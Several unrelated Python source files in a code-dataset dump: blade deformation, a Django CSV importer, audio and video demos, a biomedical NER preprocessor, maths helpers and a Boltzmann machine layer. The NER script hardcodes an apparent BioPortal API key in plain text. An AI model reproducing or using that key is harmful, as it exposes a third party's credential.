self.deformed_parameters[param][i] = self.spline[param][index, 1]\n\n def compute_all(self,\n rbf_points=1000,\n tol_chord=1e-3,\n tol_pitch=1e-3,\n tol_rake=1e-3,\n tol_skew=1e-3,\n tol_camber=1e-3):\n \"\"\"\n Computes everything:\n - control points 2D coordinates\n - deformed control points\n - spline npoints interpolations\n - deformed parameters of the original arrays\n\n The previous procedure is applied for all the parameters: `chord`,\n `pitch`, `rake`, `skew`, `camber`\n\n :param int rbf_points: if greater than zero then the Wendland C2 radial\n basis function is used to interpolate the original arrays for the\n parametric curve, so that the control points are computed according\n to the interpolated arrays. Needless to mention that longer arrays\n would produce better estimation of the control points optimum\n coordinates. In order to turn off the rbf interpolation then\n specify either 0 or -1 (Also a None value can be used too). Default\n value is 1000\n :param float tol_chord: tolerance used to extract the chord radial\n distribution for the deformed B-spline interpolation. Default value\n is 1e-3\n :param float tol_pitch: tolerance used to extract the pitch radial\n distribution for the deformed B-spline interpolation. Default value\n is 1e-3\n :param float tol_rake: tolerance used to extract the rake radial\n distribution for the deformed B-spline interpolation. Default value\n is 1e-3\n :param float tol_skew: tolerance used to extract the skew radial\n distribution for the deformed B-spline interpolation. Default value\n is 1e-3\n :param float tol_camber: tolerance used to extract the camber radial\n distribution for the deformed B-spline interpolation. Default value\n is 1e-3\n\n \"\"\"\n tols = {\n 'chord': tol_chord,\n 'pitch': tol_pitch,\n 'rake': tol_rake,\n 'skew': tol_skew,\n 'camber': tol_camber\n }\n params = ['chord', 'pitch', 'rake', 'skew', 'camber']\n for param in params:\n self.compute_control_points(param=param, rbf_points=rbf_points)\n self.update_control_points(param=param)\n self.generate_spline(param=param)\n self.compute_deformed_parameters(param=param, tol=tols[param])\n\n def _plot_parametric_curve(self,\n param,\n original=True,\n ctrl_points=True,\n spline=True,\n rbf=False,\n rbf_points=500,\n deformed=False,\n outfile=None):\n \"\"\"\n Private method to plot the parametric curve. Several options\n can be specified.\n\n :param str param: parameter corresponding to the parametric curve\n needs to be plotted. possible values are `chord`, `pitch`, `rake`,\n `skew`, `camber`\n :param bool original: if True, then plot the original points of the\n parameter at the radii sections.\n :param bool ctrl_points: if True, then plot the control points of\n that parametric curve.\n :param bool spline: If True, then plot the B-spline interpolation of\n the parametric curve.\n :param bool rbf: if True, then plot the radial basis functions\n interpolation of the parametric curve.\n :param int rbf_points: number of points used for the rbf interpolation,\n if the flag `rbf` is set True. Beware that this argument does not\n have the same function of that when computing the control points,\n although both uses the radial basis function interpolation with\n the Wendland basis.\n :param bool deformed: if True, then plot the deformed points of the\n parameter radial distribution, estimated using the B-spline\n interpolations within a given tolerance.\n :param str outfile: if string is passed, then the plot is saved\n with that name. If the value is None, then the plot is shown on\n the screen.\n \"\"\"\n self._check_param(param=param)\n\n plt.figure()\n\n if original:\n plt.plot(\n self.param.radii,\n self.param.parameters[param],\n 'o',\n label='original points')\n\n if ctrl_points:\n self._check_control_points(param=param)\n plt.plot(\n self.control_points[param][:, 0],\n self.control_points[param][:, 1],\n '*-',\n label='control points')\n\n if spline:\n self._check_spline(param=param)\n plt.plot(\n self.spline[param][:, 0],\n self.spline[param][:, 1],\n label='spline')\n\n if rbf:\n xx = np.linspace(\n self.param.radii[0], self.param.radii[-1], num=rbf_points)\n yy = np.zeros(rbf_points)\n reconstruct_f(\n original_input=self.param.radii,\n original_output=self.param.parameters[param],\n rbf_input=xx,\n rbf_output=yy,\n basis='beckert_wendland_c2_basis',\n radius=2.0)\n plt.plot(xx, yy, label='rbf')\n\n if deformed:\n self._check_deformed(param=param)\n plt.plot(\n self.param.radii,\n self.deformed_parameters[param],\n '+',\n label='deformed points')\n\n plt.grid(linestyle='dotted')\n plt.title(param + ' curve')\n plt.legend()\n\n if outfile:\n if not isinstance(outfile, str):\n raise ValueError('Output file name must be string.')\n plt.savefig(outfile)\n else:\n plt.show()\n\n def plot(self,\n param,\n original=True,\n ctrl_points=True,\n spline=True,\n rbf=False,\n rbf_points=500,\n deformed=False,\n outfile=None):\n \"\"\"\n Plot the parametric curve. Several options\n can be specified.\n\n :param array_like param: array_like of strings corresponding to the\n parametric curve that needs to be plotted. possible values are\n `chord`, `pitch`, `rake`, `skew`, `camber`\n :param bool original: if True, then plot the original points of the\n parameter at the radii sections. Default value is True\n :param bool ctrl_points: if True, then plot the control points of\n that parametric curve. Default value is True\n :param bool spline: If True, then plot the B-spline interpolation of\n the parametric curve. Default value is True\n :param bool rbf: if True, then plot the radial basis functions\n interpolation of the parametric curve. Default value is True\n :param int rbf_points: number of points used for the rbf interpolation,\n if the flag `rbf` is set True. Beware that this argument does not\n have the same function of that when computing the control points,\n although both uses the radial basis function interpolation with\n the Wendland basis. Default value is 500\n :param bool deformed: if True, then plot the deformed points of the\n parameter radial distribution, estimated using the B-spline\n interpolations within a given tolerance. Default value is False\n :param str outfile: if string is passed, then the plot is saved\n with that name. If the value is None, then the plot is shown on\n the screen. Default value is None\n \"\"\"\n if not isinstance(param, (list, tuple, np.ndarray)):\n param = [param]\n\n for par in param:\n self._plot_parametric_curve(\n param=par,\n original=original,\n ctrl_points=ctrl_points,\n spline=spline,\n rbf=rbf,\n rbf_points=rbf_points,\n deformed=deformed,\n outfile=outfile)\n\n def export_param_file(self, outfile='parameters_mod.prm'):\n \"\"\"\n Export a new parameter file with the new deformed parameters, while\n all other values are kept the same as in the original parameter file\n with the undeformed parameters. In the new parameter file (i.e. with\n deformed parameters) the deformations arrays become array of zeros.\n\n :param str outfile: file name to be written out\n \"\"\"\n\n prm = ParamFile()\n prm.radii = self.param.radii\n params = ['chord', 'pitch', 'rake', 'skew', 'camber']\n for param in params:\n if np.all(self.param.deformations[param] == 0):\n prm.parameters[param] = self.param.parameters[param]\n else:\n prm.parameters[param] = self.deformed_parameters[param]\n prm.nbasis[param] = self.param.nbasis[param]\n prm.degree[param] = self.param.nbasis[param]\n prm.npoints[param] = self.param.npoints[param]\n prm.deformations[param] = np.zeros(self.param.nbasis[param])\n\n prm.write_parameters(filename=outfile)\n","sub_path":"bladex/deform.py","file_name":"deform.py","file_ext":"py","file_size_in_byte":22659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"426320436","text":"from typing import Optional\n\nfrom django.core.management.base import BaseCommand\nimport csv\nfrom api.models import Address, Home, ZillowInfo\nfrom datetime import datetime\nimport pytz\n\n\ndef unit_multiplier(n, unit) -> int:\n if unit == \"M\":\n return n*1000000\n elif unit == \"K\":\n return n*1000\n raise NotImplementedError\n\n\ndef date_parser(date: str) -> Optional[datetime]:\n date = date.split(\"/\")\n if len(date) == 1:\n return None\n return datetime(year=int(date[2]),month=int(date[0]),day=int(date[1]),tzinfo=pytz.UTC)\n\n\nclass Command(BaseCommand):\n help = 'Imports data about houses'\n\n def add_arguments(self, parser):\n parser.add_argument(\"-s\", \"--strict\", action=\"store_true\", help=\"Gets the homes with all fields not null\")\n\n def handle(self, *args, **options):\n with open(\"../sample-data/data.csv\", mode=\"r\") as csv_file:\n csv_reader = csv.DictReader(csv_file)\n\n for row in csv_reader:\n\n if options[\"strict\"] and any([v == '' for v in row.values()]):\n continue\n\n address = Address.objects.create(\n street=\" \".join(row[\"address\"].split(\" \")[1:]),\n number=row[\"address\"].split(\" \")[0],\n zipcode=row[\"zipcode\"],\n state=row[\"state\"],\n )\n\n zillow_info = ZillowInfo.objects.create(\n zillow_id=row[\"zillow_id\"],\n last_sold_date=date_parser(row[\"last_sold_date\"]),\n last_sold_price=row[\"last_sold_price\"] or None,\n _link=row[\"link\"][len(ZillowInfo.zillow_base_link):],\n rent_price=row[\"rent_price\"] or None, #vacio\n rent_estimate_price=row[\"rentzestimate_amount\"] or None,\n rent_estimate_price_last_updated=date_parser(row[\"rentzestimate_last_updated\"]),\n price=unit_multiplier(float(row[\"price\"][1:-1]), row[\"price\"][-1]),\n price_estimate=row[\"zestimate_amount\"] or None,\n price_estimate_last_updated=date_parser(row[\"zestimate_last_updated\"]),\n tax_value=int(float(row[\"tax_value\"])) if row[\"tax_value\"] else None,\n tax_year=row[\"tax_year\"],\n )\n\n Home.objects.create(\n n_bathrooms=row[\"bathrooms\"] or None,\n n_bedrooms=row[\"bedrooms\"],\n home_size=row[\"home_size\"] or None,\n property_size=row[\"property_size\"] or None,\n home_type=row[\"home_type\"],\n year_built=row[\"year_built\"] or None,\n zillow_info=zillow_info,\n address=address\n )\n\n self.stdout.write(\"Import finished\")\n","sub_path":"listings/api/management/commands/import_house_data.py","file_name":"import_house_data.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"410032947","text":"# coding=utf-8\n#================================================================\n#\n# File name : pyaudio_demo.py\n# Author : Faye\n# Created date: 2021/1/19 16:20 \n# Description :\n#\n#================================================================\n\nimport wave\nimport pyaudio\n\n\nCHUNK = 1024\nFORMAT = pyaudio.paInt16\nCHANNELS = 2\nRATE = 44100\nRECORD_SECONDS = 5\nWAVE_OUTPUT_FILENAME = \"output.wav\"\n\np = pyaudio.PyAudio()\nstream = p.open(format=FORMAT,\nchannels=CHANNELS,\nrate=RATE,\ninput=True,\nframes_per_buffer=CHUNK)\n\nprint(\"* recording\")","sub_path":"audio/_01_pyaudio/pyaudio_demo.py","file_name":"pyaudio_demo.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"624981711","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jul 15 11:06:10 2019\r\n\r\n@author: Wang\r\n\"\"\"\r\n\r\nimport os\r\nimport re\r\nimport string\r\nimport nltk\r\nimport numpy as np\r\nimport xml.etree.ElementTree as ET\r\nimport urllib.request\r\nfrom SPARQLWrapper import SPARQLWrapper, JSON\r\nimport urllib.request, urllib.error, urllib.parse\r\nimport json\r\nimport os\r\nfrom pprint import pprint\r\n\r\n\r\nREST_URL = \"http://data.bioontology.org\"\r\nAPI_KEY = \"f6a71f57-a4ef-4389-9273-71c1faaf1605\"\r\n\r\ndef get_json(url):\r\n# get class from api\r\n opener = urllib.request.build_opener()\r\n opener.addheaders = [('Authorization', 'apikey token=' + API_KEY)]\r\n return json.loads(opener.open(url).read())\r\n\r\ndef label_obtain(annotations, get_class=True):\r\n #input the text you want to annotate into the web, and receive the label of words\r\n answer = []\r\n label = []\r\n for result in annotations:\r\n class_details = result[\"annotatedClass\"]\r\n if get_class:\r\n try:\r\n class_details = get_json(result[\"annotatedClass\"][\"links\"][\"self\"])\r\n except urllib.error.HTTPError:\r\n print(f\"Error retrieving {result['annotatedClass']['@id']}\")\r\n continue\r\n g = get_json(class_details[\"links\"][\"ancestors\"])\r\n# label.append(link[-1][\"prefLabel\"])\r\n for annotation in result[\"annotations\"]:\r\n from_to = (int(annotation[\"from\"]),int(annotation[\"to\"]))\r\n if g!=[]:\r\n if len(g)>1:\r\n label.append(g[-2]['prefLabel'])\r\n else:\r\n label.append(g[-1]['prefLabel'])\r\n else:\r\n label.append(\"Not Found\")\r\n \r\n answer.append(list(from_to))\r\n return answer,label\r\ndef getMeshIDFromLabel(disease,sparql):\r\n# used to find whether it is a disease\r\n disease = disease.lower()\r\n disease = \"\"\"'\"\"\" + disease + \"\"\"'\"\"\"\r\n # first we need to get the label\r\n query = \"\"\"PREFIX wikibase: \r\n PREFIX wd: \r\n PREFIX wdt: \r\n PREFIX rdfs: \r\n SELECT ?s ?p ?o\r\n WHERE { ?s rdfs:label\"\"\" + disease + \"\"\"@en}\"\"\"\r\n sparql.setQuery(query)\r\n sparql.setReturnFormat(JSON)\r\n results = sparql.query().convert()\r\n result = results[\"results\"][\"bindings\"]\r\n if len(result) > 0:\r\n # retrieve the result from Wikidata\r\n label = result[0][\"s\"][\"value\"]\r\n # make it as a subject URI\r\n subject = \"\"\"<\"\"\" + label + \"\"\">\"\"\"\r\n \r\n # then use the label as subject to retrieve\r\n # wdt:P486 is the predicate for mesh id\r\n query = \"\"\"PREFIX wikibase: \r\n PREFIX wd: \r\n PREFIX wdt: \r\n PREFIX rdfs: \r\n SELECT ?o WHERE { \"\"\" + subject + \"\"\" wdt:P486 ?o.}\"\"\"\r\n sparql.setQuery(query)\r\n sparql.setReturnFormat(JSON)\r\n results = sparql.query().convert()\r\n result = results[\"results\"][\"bindings\"]\r\n if len(result) > 0:\r\n # get mesh id\r\n meshid = result[0][\"o\"][\"value\"]\r\n else:\r\n # 1 indicates no result because there is no predicate of \"meshid\"\r\n meshid = \"1\"\r\n else:\r\n # 2 indicates no result because this term does not exist in Wikidata\r\n # we can try aliases or dbpedia\r\n meshid = \"2\"\r\n return meshid\r\nclass document():\r\n# fundamental class, used to store all the information got from the txt and ann.\r\n def __init__(self,text,origin,dic):\r\n self.ori = open(text).read()\r\n self.annotation = re.split(\"\\n\",open(origin).read())\r\n self.name = text\r\n self.text = nltk.word_tokenize(open(text).read()) \r\n self.context = str(open(text).read())\r\n i = 0\r\n annotation_copy = re.split(\"\\n\",open(origin).read())\r\n self.gram = nltk.pos_tag(self.text,tagset = 'universal')\r\n while i < len(self.annotation):\r\n if self.annotation[i] == \"\":\r\n del self.annotation[i]\r\n del annotation_copy[i]\r\n else:\r\n self.annotation[i] = re.split(\"\\t| \",self.annotation[i])\r\n annotation_copy[i] = re.split(\"\\t\",annotation_copy[i])[2]\r\n if self.annotation[i][0].find('#') != -1:\r\n self.annotation.pop(i)\r\n annotation_copy.pop(i)\r\n i-=1\r\n i+=1\r\n length = len(self.annotation)\r\n self.tag = [[] for g in range(length)]\r\n self.span = [[] for g in range(length)]\r\n for i in range(length):\r\n self.tag[i] = self.annotation[i][1]\r\n self.span[i] = re.split(' ',''.join(c for c in annotation_copy[i] if c not in string.punctuation))\r\n self.ori_text =[[] for i in range(len(self.text))]\r\n for i in range(len(self.text)):\r\n self.ori_text[i] = self.text[i]\r\n for g in range(len(self.text)):\r\n flag = 0\r\n res = [0 for i in range(50)]\r\n for i in range(len(dic)):\r\n if self.text[g].lower() == dic[i][0] and len(dic[i]) == 52:\r\n res = list(map(float,dic[i][1:51]))\r\n flag = 1\r\n break\r\n self.text[g] = res\r\ndef features(obj,index,sparql):\r\n# used to get the feature of each word\r\n past = [0 for i in range(50)] if index == 0 else obj.text[index-1]\r\n next_ = [0 for i in range(50)] if index == len(obj.text)-1 else obj.text[index+1]\r\n voc = np.append(np.append(obj.text[index],past),next_)\r\n caps = float(0.1*(obj.ori_text[index][0].upper() == obj.ori_text[index][0]) and (index!=0 and obj.ori_text[index-1] != '.'))\r\n# if obj.ori_text[index].isalpha() is True:\r\n# if getMeshIDFromLabel(obj.ori_text[index],sparql)!=1 or 2:\r\n# dis_exist = 1\r\n# else:\r\n# dis_exist = 0\r\n# else:\r\n# dis_exist = 0\r\n past_tag = (np.append(np.append(voc,caps),float(0.01*len(obj.ori_text[index]))))\r\n# return list(np.append(past_tag,dis_exist))\r\n return past_tag\r\n \r\ndef tag(obj,index,pa):\r\n# used to get tag of each word\r\n global past\r\n flag =0\r\n loc = 0\r\n for i in range(len(obj.span)):\r\n if (obj.ori_text[index] in obj.span[i]) and ((len(obj.span[i]) ==1) or (obj.ori_text[index-1] in obj.span[i] or obj.ori_text[index+1] in obj.span[i])):\r\n flag =1\r\n loc = i\r\n if flag == 1:\r\n past = obj.tag[loc]\r\n\r\n else:\r\n past = \"Other\"\r\n return [past]\r\ndef location(obj,index):\r\n# used to get where one word locate in order to further step: achieve the vitualization goal\r\n global before\r\n start = obj.context.find(obj.ori_text[index],before)\r\n end = obj.context.find(obj.ori_text[index],before)+len(obj.ori_text[index])\r\n before = end\r\n return(obj.ori_text[index],start,end)\r\ndef transform(objects):\r\n# input the data stored in the classes, transform it into list/dictionary.\r\n x,y,loca = [],[],[]\r\n div,mark = 0,0\r\n# mark is used to find where the data can be divided into the train set and test set\r\n global past\r\n global before\r\n past = 0\r\n vecx = DictVectorizer(sparse=True)\r\n vecy = DictVectorizer(sparse=False)\r\n for i in range(len(objects)):\r\n if i == int(0.75*len(objects)):\r\n print(i)\r\n div = mark\r\n print(i)\r\n before = 0\r\n if objects[i].context!='':\r\n text_to_annotate = objects[i].context\r\n annotations = get_json(REST_URL + \"/annotator?text=\" + urllib.parse.quote(text_to_annotate))\r\n reference,label = label_obtain(annotations)\r\n for g in range (len(objects[i].ori_text)):\r\n loc = location(objects[i],g)\r\n exist = \"None\"\r\n if reference:\r\n if len(reference[0]) > 1:\r\n for n in range(len(reference)):\r\n if loc[1]+1>=reference[n][0] and loc[2]<=reference[n][1]:\r\n exist = label[n]\r\n else:\r\n if loc[1]+1>=reference[0] and loc[2]<=reference[1]:\r\n exist = label\r\n x.append(list(np.append(features(objects[i],g,sparql),exist)))\r\n y.append(tag(objects[i],g,past))\r\n mark += 1\r\n# loca.append(loc)\r\n# d = [[] for i in range(len(x))]\r\n# for i in range(len(x)):\r\n# d[i] = {'word':x[i][302]}\r\n# print(i)\r\n# onto = vecy.fit_transform(d)\r\n# x = np.delete(x,302,1)\r\n# x = np.append(x,onto,1)\r\n return x,y,div\r\ndef clean(x,y):\r\n# clean the empty list\r\n i = 0\r\n l = len(x)\r\n while i < l:\r\n if x[i] == []:\r\n del x[i]\r\n del y[i]\r\n l-=1\r\n i-=1\r\n i+=1\r\n return x,y\r\ndef clean_(x,y,z):\r\n# the same to above, with 3 input, specially designed for diliver the location information\r\n i = 0\r\n l = len(x)\r\n while i < l:\r\n if x[i] == []:\r\n del x[i]\r\n del y[i]\r\n del z[i]\r\n l-=1\r\n i-=1\r\n i+=1\r\n return x,y,z\r\n","sub_path":"LR_preprocess.py","file_name":"LR_preprocess.py","file_ext":"py","file_size_in_byte":9505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"540672783","text":"import math\r\n\r\ndef add(first, second):\r\n return first + second\r\n\r\ndef fibonacci(length):\r\n def internal(first, second, count):\r\n third = add(first, second)\r\n count -= 1\r\n if count < 2:\r\n return third\r\n else:\r\n return internal(second, third, count)\r\n\r\n return internal(0, 1, length)\r\n\r\nHEX_CHARS = {\r\n 10: 'A',\r\n 11: 'B',\r\n 12: 'C',\r\n 13: 'D',\r\n 14: 'E',\r\n 15: 'F'\r\n}\r\n\r\ndef convert_base(num, n, add=0):\r\n \"\"\"Change a base 10 number to a base-n number. Supports up to base 16. \"\"\"\r\n new_num_string = ''\r\n current = num\r\n while current != 0:\r\n # print(current)\r\n remainder = current % n\r\n if remainder > 9:\r\n remainder_string = HEX_CHARS[remainder]\r\n elif remainder >= 36:\r\n remainder_string = '('+str(remainder)+')'\r\n else:\r\n remainder_string = str(remainder)\r\n new_num_string = remainder_string+new_num_string\r\n current = int(current/n)\r\n if add!=0:\r\n return convert_base(num,add)#converting to another base\r\n return new_num_string\r\r\ndef factorial(num):\r\n \"\"\"Get the factorial of a number\"\"\"\r\n current = num\r\n result = math.factorial(current)\r\n return result\r\n","sub_path":"maths.py","file_name":"maths.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"475375779","text":"\"\"\"Implements a layer of a Deep Boltzmann Machine.\"\"\"\nfrom layer import *\nimport pdb\n\nclass DBMLayer(Layer):\n\n def __init__(self, *args, **kwargs):\n self.phases_tied = False\n self.suff_stats = None\n self.learn_precision = False\n self.pos_phase = True\n self.sample_input = False\n super(DBMLayer, self).__init__(*args, **kwargs)\n self.is_initialized = self.proto.is_initialized\n\n def LoadParams(self, proto):\n super(DBMLayer, self).LoadParams(proto)\n self.suff_stats = cm.empty((proto.numlabels * proto.dimensions, 1))\n self.learn_precision = self.activation == deepnet_pb2.Hyperparams.LINEAR and self.hyperparams.learn_precision\n if self.learn_precision:\n self.suff_stats2 = cm.empty((proto.numlabels * proto.dimensions, 1))\n self.fig_neg = visualize.GetFigId()\n self.fig_precision = visualize.GetFigId()\n self.sample_input = self.hyperparams.sample_input\n \n def Show(self):\n \"\"\"Displays useful statistics about the layer.\"\"\"\n if not self.proto.hyperparams.enable_display:\n return\n if self.is_input:\n visualize.display_hidden(self.data.asarray(), self.fig, title=self.name)\n #visualize.display_w(self.neg_state.asarray(), self.proto.shape[0],\n # 10, self.batchsize/10, self.fig, title='data')\n #visualize.display_w(self.params['bias'].asarray(),\n # self.proto.shape[0], 1, 1, self.fig,\n # title='bias')\n #visualize.display_w(self.params['precision'].asarray(),\n # self.proto.shape[0], 1, 1, self.fig_precision,\n # title='precision')\n else:\n visualize.display_hidden(self.pos_state.asarray(), self.fig_neg, title=self.name + \"_positive\")\n #visualize.display_hidden(self.neg_state.asarray(), 2*self.fig_neg, title=self.name + \"_negative\")\n \"\"\"\n visualize.display_w(self.pos_state.asarray(), self.proto.shape[0],\n self.batchsize, 1, self.fig,\n title=self.name + \"_positive\", vmin=0, vmax=1)\n visualize.display_w(self.neg_sample.asarray(), self.proto.shape[0],\n self.batchsize, 1, self.fig_neg,\n title=self.name + \"_negative\", vmin=0, vmax=1)\n \"\"\"\n def SetPhase(self, pos=True):\n \"\"\"Setup required before starting a phase.\n\n This method makes 'state' and 'sample' point to the right variable depending\n on the phase.\n \"\"\"\n logging.debug('SetPhase in %s', self.name)\n if pos:\n self.pos_phase = True\n self.state = self.pos_state\n self.sample = self.pos_sample\n else:\n self.pos_phase = False\n self.state = self.neg_state\n self.sample = self.neg_sample\n\n def TiePhases(self):\n \"\"\"Ties the variables used in pos and neg phases.\n\n This is done to save memory when doing CD. Since the Markov chain is not run\n persistently, the neg state need not be preserved after each cycle.\n \"\"\"\n self.phases_tied = True\n if self.neg_state != self.pos_state:\n self.neg_state.free_device_memory()\n self.neg_state = self.pos_state\n if self.neg_sample != self.pos_sample:\n self.neg_sample.free_device_memory()\n self.neg_sample = self.pos_sample\n\n def InitializeNegPhase(self, to_pos=False):\n \"\"\"Initialize negative particles.\n\n Copies the pos state and samples it to initialize the ngative particles.\n \"\"\"\n self.SetPhase(pos=False)\n if to_pos:\n self.state.assign(self.pos_state)\n else:\n self.ResetState(rand=True)\n self.Sample()\n self.SetPhase(pos=True)\n\n def AllocateBatchsizeDependentMemory(self, batchsize):\n super(DBMLayer, self).AllocateBatchsizeDependentMemory(batchsize)\n\n # self.state and self.deriv were allocated in super but they are not needed\n # for DBMs, so we re-interpret them as:\n self.pos_state = self.state\n self.pos_sample = self.deriv\n self.sample = self.pos_sample\n\n # Allocate variables for negative state.\n if self.phases_tied:\n self.neg_state = self.pos_state\n self.neg_sample = self.pos_sample\n else:\n self.neg_state = cm.CUDAMatrix(np.zeros((self.numlabels * self.dimensions,\n batchsize)))\n self.neg_sample = cm.CUDAMatrix(np.zeros((self.numlabels * self.dimensions,\n batchsize)))\n\n def ComputeUp(self, train=False, recon=False, step=0, maxsteps=0):\n \"\"\"\n Computes the state of a layer, given the state of its incoming neighbours.\n\n Args:\n train: True if this computation is happening during training, False during\n evaluation.\n recon: If True, the input layer will be reconstructed from the model and\n the error will be reported. If False, this will not happen.\n step: Training step.\n maxsteps: Maximum number of steps that will be taken (Some hyperparameters\n may depend on this.)\n \"\"\"\n logging.debug('ComputeUp in %s', self.name)\n if self.is_input and self.pos_phase and not recon:\n self.GetData()\n else:\n for i, edge in enumerate(self.incoming_edge):\n neighbour = self.incoming_neighbour[i]\n if self.pos_phase:\n # Mean field in pos phase\n inputs = neighbour.state\n else:\n # Gibbs sampling in neg phase\n inputs = neighbour.sample\n if edge.node2 == self:\n w = edge.params['weight'].T\n factor = edge.proto.up_factor\n else:\n w = edge.params['weight']\n factor = edge.proto.down_factor\n if i == 0:\n cm.dot(w, inputs, target=self.state)\n if factor != 1:\n self.state.mult(factor)\n else:\n self.state.add_dot(w, inputs, mult=factor)\n b = self.params['bias']\n if self.replicated_neighbour is None:\n self.state.add_col_vec(b)\n else:\n self.state.add_dot(b, self.replicated_neighbour.NN)\n self.ApplyActivation()\n if self.hyperparams.dropout:\n if train and maxsteps - step >= self.hyperparams.stop_dropout_for_last:\n # Randomly set states to zero.\n if self.pos_phase:\n self.mask.fill_with_rand()\n self.mask.greater_than(self.hyperparams.dropout_prob)\n self.state.mult(self.mask)\n else:\n # Produce expected output.\n self.state.mult(1.0 - self.hyperparams.dropout_prob)\n\n def AddSparsityGradient(self):\n h = self.hyperparams\n damping = h.sparsity_damping\n target = h.sparsity_target\n cost = h.sparsity_cost\n\n # Update \\hat{\\rho}.\n self.means.mult(damping)\n self.means.add_mult(self.suff_stats, alpha=(1-damping)/self.batchsize)\n\n # Compute gradient.\n self.means_temp2.assign(1)\n if self.activation == deepnet_pb2.Hyperparams.LOGISTIC:\n self.means_temp2.subtract(self.means)\n self.means_temp2.mult(self.means)\n elif self.activation == deepnet_pb2.Hyperparams.TANH:\n self.means_temp2.subtract(self.means, target=self.means_temp)\n self.means_temp2.add(self.means)\n self.means_temp2.mult(self.means_temp)\n elif self.activation == deepnet_pb2.Hyperparams.RECTIFIED_LINEAR:\n self.means_temp2.assign(self.means)\n elif self.activation == deepnet_pb2.Hyperparams.RECTIFIED_LINEAR_SMOOTH:\n self.means_temp2.assign(self.means)\n\n self.means.subtract(target, target=self.means_temp)\n self.means_temp.divide(self.means_temp2)\n self.means_temp.mult(cost)\n\n # Add to the suff stats.\n self.suff_stats.add_mult(self.means_temp, alpha=-self.batchsize)\n\n def CollectSufficientStatistics(self):\n \"\"\"Collect sufficient statistics for this layer.\"\"\"\n logging.debug('Collecting suff stats %s', self.name)\n h = self.hyperparams\n\n if self.activation == deepnet_pb2.Hyperparams.REPLICATED_SOFTMAX:\n self.state.div_by_row(self.NN)\n\n if self.pos_phase:\n self.state.sum(axis=1, target=self.suff_stats)\n if h.sparsity:\n self.AddSparsityGradient()\n if self.learn_precision:\n temp = self.deriv\n b = self.params['bias']\n self.state.add_col_mult(b, mult=-1.0, target=temp)\n temp.mult(temp)\n temp.sum(axis=1, target=self.suff_stats2)\n else:\n self.suff_stats.add_sums(self.state, axis=1, mult=-1.0)\n if self.learn_precision:\n temp = self.deriv\n b = self.params['bias']\n self.state.add_col_mult(b, mult=-1.0, target=temp)\n temp.mult(temp)\n self.suff_stats2.add_sums(temp, axis=1, mult=-1.0)\n\n if self.activation == deepnet_pb2.Hyperparams.REPLICATED_SOFTMAX:\n self.state.mult_by_row(self.NN)\n\n if self.pos_phase and h.sparsity:\n return float(self.means.asarray().mean())\n\n def UpdateParams(self, step=0):\n \"\"\"Update parameters associated with this layer.\"\"\"\n logging.debug('UpdateParams in %s', self.name)\n h = self.hyperparams\n numcases = self.batchsize\n\n if h.epsilon_decay == deepnet_pb2.Hyperparams.NONE:\n epsilon = h.base_epsilon\n elif h.epsilon_decay == deepnet_pb2.Hyperparams.INVERSE_T:\n epsilon = h.base_epsilon / (1 + float(step) / h.epsilon_decay_half_life)\n elif h.epsilon_decay == deepnet_pb2.Hyperparams.EXPONENTIAL:\n epsilon = h.base_epsilon / np.power(2, float(step) / h.epsilon_decay_half_life)\n if step < h.start_learning_after:\n epsilon = 0.0\n\n if h.momentum_change_steps > step:\n f = float(step) / h.momentum_change_steps\n momentum = (1.0 - f) * h.initial_momentum + f * h.final_momentum\n else:\n momentum = h.final_momentum\n\n # Update bias.\n if self.learn_precision:\n p = self.params['precision']\n p.upper_bound(h.precision_upper_bound)\n self.suff_stats.mult(p)\n b = self.params['bias']\n #b_delta = self.params['grad_bias']\n b_delta = self.grad_bias\n b_delta.mult(momentum)\n b_delta.add_mult(self.suff_stats, 1.0 / numcases)\n if h.apply_l2_decay:\n b_delta.add_mult(b, -h.l2_decay)\n\n if self.learn_precision:\n p = self.params['precision']\n b.divide(p)\n b.add_mult(b_delta, epsilon)\n b.mult(p)\n else:\n b.add_mult(b_delta, epsilon)\n\n # Update precision.\n if self.learn_precision:\n p = self.params['precision']\n p_delta = self.params['grad_precision']\n p_delta.assign(0)\n for i, edge in enumerate(self.incoming_edge):\n inputs = edge.suff_stats\n temp = edge.temp\n if edge.node2 == self:\n w = edge.params['weight'].T\n else:\n w = edge.params['weight']\n inputs.mult(w, target=temp)\n p_delta.add_sums(temp, axis=1)\n p_delta.subtract(self.suff_stats2)\n p_delta.divide(p)\n p.add_mult(p_delta, h.precision_epsilon / numcases)\n p.upper_bound(h.precision_upper_bound)\n p.lower_bound(0)\n\n","sub_path":"deepnet/dbm_layer.py","file_name":"dbm_layer.py","file_ext":"py","file_size_in_byte":10760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"203332865","text":"import cv2\r\n\r\n#저장한 동영상 파일을 불러오는 부분\r\ncap = cv2.VideoCapture('output.avi')\r\n\r\n\r\nwhile(True):\r\n #캠으로 화면을 캡쳐하는 부분\r\n ret, img_color = cap.read()\r\n\r\n #동영상 리드가 false면 종료 // 동영상을 모두 플레이하면 종료\r\n if ret == False:\r\n break\r\n\r\n #캡펴한 화면을 회색(grayscale)로 변환하는 부분\r\n img_gray = cv2.cvtColor(img_color, cv2.COLOR_BGR2GRAY)\r\n\r\n #캡쳐한 화면을 컬러로 불러오는 부분\r\n cv2.imshow(\"Color\", img_color)\r\n\r\n #캡쳐한 화면을 흑백으로 불러오는 부분\r\n cv2.imshow(\"Gray\", img_gray)\r\n\r\n\r\n #ESC키 값의 입력을 1초간? 대기하는 부분\r\n if cv2.waitKey(1) & 0xff == 27:\r\n break\r\n\r\n#키가 눌리면 메모리에서 해제함\r\ncap.release()\r\n\r\n\r\n#화면을 끄는 